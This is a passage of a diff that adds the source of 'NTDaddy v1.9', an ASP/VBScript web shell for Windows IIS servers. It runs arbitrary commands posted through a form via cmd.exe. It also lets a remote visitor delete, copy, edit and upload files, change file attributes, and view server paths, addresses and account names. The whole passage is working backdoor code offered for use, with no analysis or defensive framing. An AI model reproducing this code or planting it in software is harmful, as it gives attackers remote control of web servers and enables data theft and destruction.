+|     -obzerve : mr_o@ihateclowns.com |
+=======================================
+-->
+<%@ Language=VBScript %>
+<%Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+On Error Resume Next
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+End If%>
+<% if request.form("flag")=""then %>
+<html>
+<head>
+<title>|[NTDaddy v1.9 - obzerve | fux0r inc.]</title>
+<%
+'Commands
+dim fs,f
+dim FilePath,FolderPath,FileTo,Cmd
+dim selFolder,FolderTo
+dim Tempmsg
+dim TempAtt
+dim TextOutput,TextWrite,TextFile,lblioMode,lblFormat,TextCreateFormat
+Const ForReading = 1, ForWriting = 2, ForAppending = 3
+Set fs = CreateObject("Scripting.FileSystemObject")
+FilePath=Request.Form("FileName")
+FolderPath=Request.Form("FolderPath")
+selFolder=Request.Form("FolderName")
+FolderTo=Request.form("CopyFolderTo")
+FileTo=Request.Form("CopyFileTo")
+Cmd=Request.Form("cmdOption")
+TextCmd=Request.form("cmdtxtFileOption")
+Select case Cmd
+case "DeleteFile"       
+fs.deletefile FilePath,TRUE
+response.write("File: " & FilePath & " has been deleted.")
+case "DeleteFolder"     
+fs.deletefolder selFolder,TRUE
+response.write("Folder: " & selFolder & " has been deleted.")
+FolderPath=Request.form("RefreshFolderPath")
+case "CopyFile"
+fs.CopyFile FilePath,FileTo, TRUE
+response.write("File: " & FilePath & " has been copied to " & FileTo & ".")
+case "CopyFolder"
+fs.CopyFolder selFolder,FolderTo, TRUE
+response.write("Folder: " & selFolder & " has been copied to " & FolderTo & ".")
+case "SetFileAttributes"
+on error resume next
+if FilePath <> "" then
+Set f = fs.GetFile(FilePath)
+select case f.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f.attributes
+end select
+end if  
+response.write("<form name=frmFileAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FileName Value=" & chr(34) & FilePath & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>File Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FileAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FileAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FileAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FileAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FileAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FileAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FileAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FileAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FileAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFileAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of File: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FileAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "SetFolderAttributes"
+on error resume next
+FolderPath=Request.form("RefreshFolderPath")
+if selFolder <> "" then
+Set f = fs.Getfolder(selFolder)
+select case f.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+end if  
+response.write("<form name=frmFolderAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FolderName Value=" & chr(34) & selFolder & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 cellspacing=1 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Folder Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FolderAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FolderAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FolderAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FolderAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FolderAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FolderAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FolderAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FolderAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FolderAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFolderAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of Folder: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FolderAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "OpenTextFile"
+If FilePath <> "" then
+lblioMode=Request.form("optiomode")
+lblFormat=request.form("optformat")
+set TextFile = fs.OpenTextFile (FilePath, lblioMode, lblFormat)
+TextOutput = TextFile.ReadAll   
+'TextOutput=""
+'Do While TextFile.AtEndOfStream <> True
+'       TextOutput = TextOutput & TextFile.ReadLine
+'Loop
+TextFile.close
+else
+FilePath = FolderPath
+end if
+response.write("<form name=frmTextFile action=ntdaddy.asp method=post>")
+response.write("<center><table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff width=100% height=100% >")
+response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOption value=SaveAs><input type=text size=77 name=FileName value=" & chr(34) & FilePath & chr(34) & "><select name=optUnicode><option value=FALSE>ASCII <option value=TRUE>Unicode</select></td></tr>")
+response.write("<tr><td bgcolor=#ffffff><center><textarea name=txtFile rows=20 cols=85>" & TextOutput & "</textarea></center></td></tr>")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<ERROR: THIS IS NOT A TEXT FILE>")
+response.write(chr(13))
+response.write("<FilePath: " & FilePath & ">")
+response.write(chr(13))
+response.write("<ioMode: " & lblioMode & ">")
+response.write(chr(13))
+response.write("<Format: " & lblFormat & ">")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<tr><td><input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & "></td></tr>")
+response.write("</table></center><p>") 
+case "ApplyFileAttributes"
+TempAtt=int(Request.form("FileAttribute1"))
+TempAtt=TempAtt + int(Request.form("FileAttribute2"))
+TempAtt=TempAtt + int(Request.form("FileAttribute3"))
+TempAtt=TempAtt + int(Request.form("FileAttribute4"))
+TempAtt=TempAtt + int(Request.form("FileAttribute5"))
+TempAtt=TempAtt + int(Request.form("FileAttribute6"))
+TempAtt=TempAtt + int(Request.form("FileAttribute7"))
+TempAtt=TempAtt + int(Request.form("FileAttribute8"))
+TempAtt=TempAtt + int(Request.form("FileAttribute9"))
+Set f = fs.GetFile(FilePath)
+f.attributes=int(TempAtt)
+response.write("File: " & FilePath & " attributes have been changed.")
+case "ApplyFolderAttributes"
+FolderPath=Request.form("RefreshFolderPath")
+TempAtt=int(Request.form("FolderAttribute1"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute2"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute3"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute4"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute5"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute6"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute7"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute8"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute9"))
+Set f = fs.Getfolder(selFolder)
+f.attributes=int(TempAtt)
+response.write("Folder: " & selFolder & " attributes have been changed.")
+end select
+Select Case TextCmd
+case "SaveAs"
+TextWrite = Request.form("txtFile")
+TextCreateFormat = Request.form("optUnicode")
+if textcreateformat = "TRUE" then
+tempmsg="Unicode"
+else
+tempmsg="ASCII"
+end if
+Set TextFile = fs.CreateTextFile(FilePath, True,TextCreateFormat)
+TextFile.Write TextWrite
+TextFile.Close
+response.write("File: " & FilePath & " Format: " & tempmsg & " has been saved.")
+end select
+%>
+<%
+Public CurrentPath
+Function ShowDriveLetters()
+on error resume next
+Dim fs, d, dc, t
+dim isReadyColor,TempSize,ShowDriveInfo
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set dc = fs.Drives
+ShowDriveInfo=Request.Form("chkShowDriveInfo")
+response.write("<form name=lstDrives action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+if showdriveinfo="TRUE" then
+response.write("<tr colspan=8><td align=center colspan=8 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE> Show Drive Info  </td></tr>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>File System</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Serial #</u><b></td>")
+else
+response.write("<tr colspan=2><td align=center colspan=2 bgcolor=#f8f8ff><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE>Show Drive Info</td></tr>")
+end if
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Type</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Drive</u><b></td>")
+if showdriveinfo="TRUE" then
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Volume Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Share Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Free Space</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Total Size</u><b></td>")
+end if
+response.write("</tr>")
+For Each d in dc
+Select Case d.DriveType
+Case 0: t = "Unknown"
+Case 1: t = "Removable"
+Case 2: t = "Fixed"
+Case 3: t = "Network"
+Case 4: t = "CD-ROM"
+Case 5: t = "RAM Disk"
+End Select
+if showdriveinfo="TRUE" then
+if d.isReady then
+response.write("<TR bgcolor=#000000>")
+else
+response.write("<TR bgcolor=#191970>")
+end if
+if d.filesystem = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.filesystem & "</td>")
+end if
+if d.SerialNumber = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.SerialNumber & "</td>")
+end if
+else
+response.write("<TR>")
+end if
+response.write("<td align=center>" & t & "</td>")
+response.write("<td align=center><input type=submit name=FolderPath value=" & d.driveletter & ":\></td>")
+if showdriveinfo="TRUE" then
+if d.volumename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.volumename & "</td>")
+end if
+if d.sharename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.sharename & "</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+freespace = (d.AvailableSpace / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(freespace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+totalspace = (d.TotalSize / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(totalspace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+end if
+Next
+response.write("</tr>")
+response.write("</tr></table>")
+response.write("</form>")
+End Function
+Function ShowFolderNames()
+on error resume next
+Dim fs, f, f1, s, sf ,FP
+dim ShowFolderInfo,FolderAttributes 
+ShowFolderInfo=request.form("chkShowFolderInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set sf = f.SubFolders
+response.write("<form name=lstFolders action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=Submit name=FolderPath value=RefreshFolder></td></tr>")
+response.write("<input type=hidden name=RefreshFolderPath value=" & chr(34) &  fp & chr(34) & ">")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowFolderInfo value=TRUE> Show Folder Info</td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFolder><br><input type=submit name=cmdOption Value=CopyFolder> to <input type=text name=CopyFolderTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFolderAttributes>")
+if showfolderinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Folder</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in sf
+if showfolderinfo="TRUE" then
+response.write("<tr>")
+response.write("<td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+folderattributes="...."
+select case f1.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FolderAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "\</td></tr>")
+else
+response.write("<tr><td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td></tr>")
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+Function ShowFileNames()
+on error resume next
+Dim fs, f, f1, fc, FP
+dim ShowFileInfo,FileAttributes,ShowPrefix
+ShowPrefix=request.form("txtShowPrefix")
+ShowFileInfo=Request.form("chkShowFileInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set fc = f.Files
+response.write("<form name=lstFiles action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=submit value=RefreshFiles> <input type=checkbox name=chkShowFileInfo value=TRUE> Show File Info &<br>Show Only:  <input type=text name=txtShowPrefix value= ></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFile><input type=submit name=cmdOption Value=CopyFile> to <input type=text name=CopyFileTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=OpenTextFile><select name=optioMode><option value=" & chr(34) & "1" & chr(34) & ">For Reading <option value="& chr(34) & "2" & chr(34) & ">For Writing <option value=" & chr(34) & "8" & chr(34) & ">For Appending</select><select name=optformat><option value=" & chr(34) & "-2" & chr(34) & ">System Default <option value=" & chr(34) & "-1" & chr(34) & ">Unicode <option value=" & chr(34) & "0" & chr(34) & ">ASCII</select></td>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFileAttributes>")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & fp & chr(34) & "></tr>")
+if showfileinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>File</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in fc
+if showfileinfo="TRUE" then
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr>")
+response.write("<td align=center nowrap><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+select case f1.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FileAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "</td></tr>")
+end if
+else
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr><td><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td></tr>")
+end if
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+%>
+<STYLE>
+BODY
+{scrollbar-face-color: #f8f8ff; scrollbar-shadow-color: #cccccc;
+scrollbar-highlight-color: #cccccc; scrollbar-3dlight-color: #cccccc;
+scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000;
+scrollbar-arrow-color: #000000}
+</STYLE>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<center>
+<font size="18" color="#ffffff">NTDaddy | fux0r inc.</font>
+<hr color="#ffffff">
+<table border=1 width="100%" color="#fffff">
+<tr>
+<td align=center width=100% bgcolor=#ffffff><font color=#000000><a name=lblCurrentPath value=
+<% 
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+end if
+response.write(chr(34) & IP & chr(34) & ">" & FP)
+%>
+</a></td>
+</tr>
+</table>
+<table border=0 cellspacing=1 bordercolor="#ffffff" width=100% height=100%>
+<tr colspan=3><td align=left colspan=3><% =ShowDriveLetters() %></td>
+<td align=center></td></tr>
+<tr valign=top width=100%><td align=left><% =ShowFolderNames() %></td>
+<td align=right><% =ShowFileNames() %></td>
+</tr>
+</table>
+<br><hr color="#ffffff"><br>
+<table cellpadding="3" cellspacing="3" border="5" bordercolor="#ffffff">
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>• Remote Info.</b></font>
+</td>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>• Local Info.</b></font>
+</td>
+</tr>
+<tr>
+<td align=left>
+<div align=left><font size="3">
+<b>User</b>: <%= "\\" & oScriptNet.ComputerName & " \ " & oScriptNet.UserName %> <br>
+<b>ID</b>: <%=request.servervariables("SERVER_NAME")%> <br>
+<b>IP</b>: <%=request.servervariables("LOCAL_ADDR")%> <br>
+<b>HTTPD</b>: <%=request.servervariables("SERVER_SOFTWARE")%> <b>Port</b>: <%=request.servervariables("SERVER_PORT")%> <br>
+<b>Webroot</b>: <%=request.servervariables("APPL_PHYSICAL_PATH")%> <br>
+<b>LogRoot</b>: <%=request.servervariables("APPL_MD_PATH")%> <br>
+<b>Date</b>: <% =date() %> <br>
+<b>Time</b>: <%=time() %> <br>
+<b>HTTPs</b>: <%=request.servervariables("HTTPS")%>
+<br></font></div>
+</td>
+<td align="left" valign="top">
+<b>Local Addr (What they see.)</b>: <%=request.servervariables("REMOTE_ADDR")%> <br>
+<b>Forwarded from</b> : <%=request.servervariables("HTTP_X_FORWARDED_FOR")%> <br>
+<b>Via</b>: <%=request.servervariables("HTTP_VIA")%> <br>
+<b>User Agent</b>: <%=request.servervariables("HTTP_USER_AGENT")%> <br>
+<b>Wookie</b>: <%=request.servervariables("HTTP_WOOKIE")%> <br>
+<b>Cache Control</b>: <%=request.servervariables("HTTP_CACHE_CONTROL")%> <br>
+<b>Interface</b>: <%=request.servervariables("GATEWAY_INTERFACE")%> <br>
+<b>Protocol</b>: <%=request.servervariables("SERVER_PROTOCOL")%> <br>
+<b>Method</b>: <%=request.servervariables("REQUEST_METHOD")%>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<table cellpadding="3" cellspacing"1" bordercolor="#F8F8FF" border=5>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>• File Upload Utility</b></font></td>
+</tr>
+<tr>
+<td align="left">
+<form method=post ENCTYPE="multipart/form-data">
+<b>File</b> : <input type="file" size="35" name="File1"><br>
+<input type="submit" Name="Action" value="Upload the file">
+</form></td>
+</tr>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>• RAW D.O.S. COMMAND INTERFACE</b></font></td>
+</tr>
+<tr valign="top">
+<td align="left">
+<form action="<%= Request.ServerVariables("URL") %>" method="POST">
+<p><input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="submit" value="Run"> </p>
+</form>
+<pre>
+<%
+If (IsObject(oFile)) Then
